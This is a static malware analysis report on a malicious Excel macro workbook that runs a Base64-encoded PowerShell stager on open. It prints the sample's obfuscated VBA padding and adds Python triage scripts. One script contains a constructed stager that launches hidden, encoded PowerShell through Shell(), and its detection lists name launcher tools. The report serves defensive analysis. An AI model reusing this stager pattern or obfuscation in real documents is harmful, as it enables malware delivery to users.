Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 16210e8a2a76483f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 57.5 KB
Created: 2018-11-28 09:45:34
Authoring application: Microsoft Excel
First seen: 2019-02-10
MD5: 917f090fe1e8450278c0a7a158ba3860
SHA-1: 0a959339041018df8374f04dc46a5b763bb4375d
SHA-256: 16210e8a2a76483f20c28362318756380704eecbf2351858f4eb6953b58788bc
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.005 Command and Scripting Interpreter: Visual Basic

The critical OLE_VBA_SHELL and OLE_VBA_BASE64_SHELL_COMMAND_STAGER heuristics indicate that the Workbook_Open macro decodes a Base64 string literal into a PowerShell command and executes it with Shell(). A command launched this way is typically a stager, so it is likely responsible for downloading and executing a second-stage payload; static analysis alone cannot show what that payload is. The VBA source is padded with junk: long random identifiers and Do Until loops whose two string-literal operands always differ, so the condition is true on the first test and the loop bodies never run. Together with the encoded command, this is a deliberate attempt to evade keyword-based detection. Note that the preview reproduced below is cut off before the Shell() call and contains none of the five Base64-like blobs reported for the extracted artifact, so the verdict rests on the heuristics and the artifact triage rather than on the visible lines.

Heuristics (7)

  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro code calls Shell(), which runs an external command line.
  • VBA Base64-decoded Shell command stager [critical] OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    An auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell(). This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    The macro runs automatically when the workbook is opened (Workbook_Open).
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro instantiates COM objects via CreateObject.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, or documents whose source extraction fails, where the visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
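The decode-then-Shell chain that the OLE_VBA_BASE64_SHELL_COMMAND_STAGER and OLE_VBA_PCODE_AUTOEXEC_EXEC entries describe can be reproduced as a small triage script. The Python below is an added example written for this page; it is not the analyser's own heuristic code and not part of oletools/olevba. It runs over a constructed VBA snippet that imitates the pattern: the Base64 literal carries a harmless placeholder PowerShell command, not the sample's real payload (which the truncated preview does not show), and the function names and the MSXML2.DOMDocument decoding idiom in the snippet are assumptions. It goes one step beyond the single-layer case the heuristic text describes by also unwrapping a PowerShell -EncodedCommand (UTF-16LE) layer nested inside the decoded command.

```python
import base64
import re

# Constructed stand-in for the chain the heuristics describe (NOT the analysed
# sample's payload): Workbook_Open decodes a Base64 literal and runs it via
# Shell(). The command is a harmless placeholder; building the Base64 here
# keeps it exact. A UTF-16LE -EncodedCommand layer is nested inside it.
_INNER_CMD = "Write-Output 'placeholder stage-2'"
_INNER_B64 = base64.b64encode(_INNER_CMD.encode("utf-16-le")).decode()
_OUTER_B64 = base64.b64encode(
    f"powershell -nop -w hidden -enc {_INNER_B64}".encode()).decode()

SAMPLE_VBA = f'''Attribute VB_Name = "ThisWorkbook"
Private Sub workbook_open()
    Dim cmd As String
    cmd = B64("{_OUTER_B64}")
    Shell cmd, vbHide
End Sub

Function B64(txt As String) As String
    ' assumed decoder idiom: MSXML2 DOMDocument bin.base64 node
    Dim el As Object
    Set el = CreateObject("MSXML2.DOMDocument").createElement("b64")
    el.DataType = "bin.base64"
    el.Text = txt
    B64 = StrConv(el.nodeTypedValue, vbUnicode)
End Function
'''

# Benign control (constructed): auto-exec macro without an execution primitive.
CONTROL_VBA = '''Private Sub Workbook_Open()
    MsgBox "hello"
End Sub
'''

AUTOEXEC = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(workbook_open|auto_open|autoopen|document_open|workbook_activate)\b',
    re.I | re.M)
EXEC_TOKENS = re.compile(r'\b(Shell|CreateObject|GetObject|ShellExecute)\b', re.I)
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')
LAUNCHER = re.compile(
    r'\b(powershell|pwsh|cmd|cscript|wscript|mshta|rundll32|regsvr32|certutil|bitsadmin)\b',
    re.I)
ENC_FLAG = re.compile(r'-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)', re.I)


def bytes_to_text(raw):
    """Printable text from decoded bytes: UTF-16LE first (the -EncodedCommand
    convention, recognisable by zero high bytes), then ASCII; None otherwise."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and set(raw[1::2]) == {0}:
        text = raw.decode("utf-16-le")
    else:
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            return None
    return text if text.isprintable() else None


def decode_layers(literal):
    """Decode one Base64 literal; if the result carries -enc/-EncodedCommand,
    decode that UTF-16LE payload as well. Returns layers, outermost first."""
    if len(literal) % 4:
        return []
    try:
        raw = base64.b64decode(literal, validate=True)
    except ValueError:
        return []
    text = bytes_to_text(raw)
    if text is None:
        return []
    layers = [text]
    m = ENC_FLAG.search(text)
    if m:
        layers += decode_layers(m.group(1))
    return layers


def triage(vba_src):
    """Check the three legs of the stager chain: auto-exec entry point,
    Shell() primitive, and a Base64 literal that decodes to launcher text."""
    autoexec = [m.group(1).lower() for m in AUTOEXEC.finditer(vba_src)]
    exec_tokens = sorted({m.group(1) for m in EXEC_TOKENS.finditer(vba_src)},
                         key=str.lower)
    decoded = {}
    for lit in B64_LITERAL.findall(vba_src):
        layers = decode_layers(lit)
        if layers:
            decoded[lit] = layers
    launchers = sorted({m.group(1).lower() for layers in decoded.values()
                        for text in layers for m in LAUNCHER.finditer(text)})
    has_shell = "shell" in [t.lower() for t in exec_tokens]
    return {"autoexec": autoexec, "exec_tokens": exec_tokens,
            "decoded": decoded, "launchers": launchers,
            "stager": bool(autoexec) and has_shell and bool(launchers)}


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("control", CONTROL_VBA)):
        r = triage(src)
        print(name, "stager:", r["stager"], "launchers:", r["launchers"])
        for layers in r["decoded"].values():
            for depth, text in enumerate(layers):
                print(f"  layer {depth}: {text[:60]}")
```

The verdict requires all three legs together, which is what separates a stager from a macro that merely contains a Base64 string (a benign control with Workbook_Open and no Shell() scores nothing). On a real artifact the same functions can be run over olevba's decoded source, and a literal that decodes to an -EncodedCommand wrapper should be unwrapped before keyword matching, otherwise the launcher name is hidden one layer deeper than the heuristic text anticipates.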

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14843 bytes
SHA-256: 9852770022283bc0d03befca403d61733d4d4a687c535519b7d8832e47d58e8e
Detection
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script (the copy reproduced below is itself truncated part-way through)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
XRt4bgFPUd_fUS9.fEysLhWhTBNlppK2s3So
Do Until "Ykq8y" <> "vwgEA_9SlGJQCNZ5QCmvuLTIKwf8c"
Dim g4Xz4ZuzaSBORChAjon3sFhDJ As Byte
Dim ChbV4LbAzDLvZHwnDzsjfbHvHkF2_sYUToz1RcgEhNb9TNH As CheckBox
Loop
Do Until "fzMoPxbniXpMREj6Em1ZuQ6UjQ" <> "mAQ_IZ4ajA"
Dim zDGf1_PakON98QUTcwWN31D8JaViNNRzeh_BdSitAdsTCmB As Byte
Dim my7ECUG89ITYmpLV6WcYLSyHLlLX As CheckBox
Loop
Do Until "Gs5g" <> "XW6XQLwHZFBT8I"
Dim FSPVWoHlvR_ As Byte
Dim w3ZGrzNMw_OtwDsiT9_QcI As CheckBox
Loop
Do Until "Cd2FtUNXuklXcRVAqPwEJ" <> "H1icQn_xmpA"
Dim emz5Nk_39XNnFXjYLRQxdV93mRmapHiG4k3 As Byte
Dim ybZu_J3Fu4LaDqM2dT1fGn6Q67lKzxEseet6vgKlj As CheckBox
Loop

Do Until "OL8Y1htaP_vCDtJe" <> "HxGgpP7xc5h6Q_7HM52"
Dim a81_W2shsRpZu As Byte
Dim iYlrD_39OI659wIJFmxG1rgQsso7qLdvcwV1bN_HB3 As CheckBox
Loop
Do Until "Kx4HW_i" <> "Wko1Q3z2T8SX6QBnHaKYQq2g"
Dim nE8fsWjTjVRjy5J4e9GOtsEkHHtqKnPosF As Byte
Dim KK5SH7W9xh8ayMOP4Rikw5_UWil2G5Em1qr98K As CheckBox
Loop
Do Until "yJ2u5flpSfZ" <> "t8_FSPKh5iSdz2bTjGdPRqbXsB_bs"
Dim pOEaLJGgsVawYOOzW As Byte
Dim BDQEJAIkBdpVQPryNRMC As CheckBox
Loop
Do Until "mpTvztCc2ZKgUG7XZiDDPjH" <> "l1U_"
Dim JDjA7lSOTrdNZ8oskQGAIRR As Byte
Dim WnNHuBgq5cn1XQXN5A1lo6TlEj1fTrT52uLUqbhMvAitvEPaKBK9RplaSl As CheckBox
Loop
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "XRt4bgFPUd_fUS9"
Dim anyHn6MqLKYuJP1HKhLqOkQhrGm3EuT85SlZ7SDjHFRZiEIQAOu1ftOzVOYeRTjazaz1nZK1dlgGQ18l8T1z9caICuDp3gPxfziGNR As String
 Function CII_VKHr9mDCgbalynViz9SYTQfTlKGuB_YXDvmVkCEmVHdsfoz7_suCzto(cM4ZonJM2qXBciIBV6zUmrdfjjhXtHIAL77HHAV76oQt__G4ijcLvesurVy__vcrgWyfl_2Ui3Y8Ysae)
Do Until "lzg3" <> "KVYOTbJkCOrL_pPqJZk"
Dim xLEKnH3W8pHQ8bDlsIyuqkrZqOL7OcaX6BK8PMkJhvlVEYMkkm7Ajz As Byte
Dim HKdncX65GdMtU6O_UehmK58TSQ As CheckBox
Loop
Do Until "AjTkeYw_2_" <> "cksKNmmGGUCQTfQa"
Dim b7mLMITJWTjf9x6PCOksuUXhPzL7NsNxRD7zanvROhx4BFGS As Byte
Dim XuM_4goEg_6V7V5n_vL5zEyWcQbLgdeH As CheckBox
Loop

 Dim ZePsqJFV6VK6I3sSl3CDHxAfEz_bch28ArLDGW_TnETZVDbClG4IbcFkdsl1Im2W
Do Until "q2gbdI4tW1QUrXU3lIxO4LcR6y" <> "jkDagC"
Dim hvnDxbH51af8wboD6ijWoONdXNenhQp5RMw6sQD As Byte
Dim I_3WaodecIfod1IWRfIoi6cVhujnhnsTmeYWv1vy As CheckBox
Loop
Do Until "sBdBlKDHzdXilcMeexpDy6xZJA8Zv" <> "jZtSuz"
Dim S6iferIStAAK1 As Byte
Dim OBEuDwLCzkLlUOCnOzmSeK As CheckBox
Loop


   Dim UWzJF6SARqfHfSsskizk_yEFb6x6_6dj9mjYFreubPwi_l6UbfCfhO
Do Until "FfRLnEZ97N4SWmhqCp5cSU3HbEo" <> "dIV2TDH9Mtig7YkOWa5n_qH"
Dim jlirhtmIthY6xiV As Byte
Dim iONnS7bH8CqEdqgZnwAvNtUjMiiy8fcvoA2nYUVKFc As CheckBox
Loop
Do Until "knzmGaLGtGwvFx3m" <> "YsVmIai4Ycy2_RYyotHqtjaGlz"
Dim uT933Cuv5l As Byte
Dim xbSHD5LnlSFar8FVnK2yQNARpN5fiuFMVw_LZ9l As CheckBox
Loop
   
Do Until "yVv" <> "dQsRk_vfWh3ESiZ_"
Dim by9p_zL3D5835nhCbesshVl4tBVgSPbYuYfwyppnDzNpB2ks_zmxzpa_L As Byte
Dim D5BbohwagGeGuLuxDorG522ZmgblniD8ajutmJXPZMctEjMm1 As CheckBox
Loop
Do Until "uAr7PKBkxGEIw8CfpJZ_I3P
... (truncated)
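The preview above is dominated by Do Until loops whose two string literals always differ, so the condition is true on the first test and the Dim-only body never executes; they exist only to bury the one real statement, the call into module XRt4bgFPUd_fUS9. The Python below is an added example for this page, not part of the report or of olevba, that strips such dead loops and lists the calls left in the auto-exec procedure so an analyst knows which module to follow next. It runs over an excerpt copied from the preview (cut down to two loops); a loop whose constant condition never lets it exit is an infinite loop rather than dead padding, so the stripper keeps and counts it instead of removing it.

```python
import re

# Excerpt copied from the preview above, cut down to two loops: each Do Until
# compares two different string literals, so the condition is true on the
# first test and the Dim-only body is dead code.
PREVIEW_EXCERPT = '''Private Sub workbook_open()
XRt4bgFPUd_fUS9.fEysLhWhTBNlppK2s3So
Do Until "Ykq8y" <> "vwgEA_9SlGJQCNZ5QCmvuLTIKwf8c"
Dim g4Xz4ZuzaSBORChAjon3sFhDJ As Byte
Dim ChbV4LbAzDLvZHwnDzsjfbHvHkF2_sYUToz1RcgEhNb9TNH As CheckBox
Loop
Do Until "fzMoPxbniXpMREj6Em1ZuQ6UjQ" <> "mAQ_IZ4ajA"
Dim zDGf1_PakON98QUTcwWN31D8JaViNNRzeh_BdSitAdsTCmB As Byte
Dim my7ECUG89ITYmpLV6WcYLSyHLlLX As CheckBox
Loop
End Sub
'''

LOOP_HEAD = re.compile(
    r'^\s*Do\s+(Until|While)\s+"([^"]*)"\s*(<>|=)\s*"([^"]*)"\s*$', re.I)
ANY_DO = re.compile(r'^\s*Do\b', re.I)
LOOP_END = re.compile(r'^\s*Loop\b', re.I)
SUB_START = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(workbook_open|auto_open|autoopen|document_open)\b', re.I)
SUB_END = re.compile(r'^\s*End\s+Sub\b', re.I)
CALL = re.compile(r'^\s*([A-Za-z_]\w*)\.([A-Za-z_]\w*)\s*$')


def body_is_dead(kind, lhs, op, rhs):
    """Evaluate a constant string comparison (Option Compare Binary default,
    so case-sensitive). True: the loop exits before its body runs (padding).
    False: the condition never lets the loop exit (an infinite loop)."""
    equal = lhs == rhs
    cond = equal if op == "=" else not equal
    return cond if kind.lower() == "until" else not cond


def strip_dead_loops(src):
    """Drop Do/Loop blocks whose literal condition makes the body unreachable,
    tracking nesting so an inner Do/Loop does not end the outer block early.
    Returns (cleaned_source, stats)."""
    lines = src.splitlines()
    out = []
    stats = {"removed_loops": 0, "infinite_loops": 0,
             "lines_before": len(lines), "lines_after": 0}
    i = 0
    while i < len(lines):
        m = LOOP_HEAD.match(lines[i])
        if m:
            if body_is_dead(*m.groups()):
                depth, j = 1, i + 1
                while j < len(lines) and depth:
                    if ANY_DO.match(lines[j]):
                        depth += 1
                    elif LOOP_END.match(lines[j]):
                        depth -= 1
                    j += 1
                if depth == 0:          # matching Loop found: skip the block
                    stats["removed_loops"] += 1
                    i = j
                    continue
            else:
                stats["infinite_loops"] += 1   # keep it, but flag it
        out.append(lines[i])
        i += 1
    stats["lines_after"] = len(out)
    return "\n".join(out) + "\n", stats


def autoexec_calls(src):
    """List Module.Procedure calls left inside auto-exec procedures; with the
    padding gone these are the places to follow next in the extracted source."""
    calls, inside = [], False
    for line in src.splitlines():
        if SUB_START.match(line):
            inside = True
        elif SUB_END.match(line):
            inside = False
        elif inside:
            m = CALL.match(line)
            if m:
                calls.append((m.group(1), m.group(2)))
    return calls


if __name__ == "__main__":
    cleaned, stats = strip_dead_loops(PREVIEW_EXCERPT)
    print(cleaned)
    print(stats)
    print("follow next:", autoexec_calls(cleaned))
```

Run over the full macros.bas rather than this excerpt, the ratio of lines_before to lines_after gives a quick measure of how much of the module is padding, and the surviving call list points at the module and procedure where the decode and Shell() logic flagged by the heuristics must live.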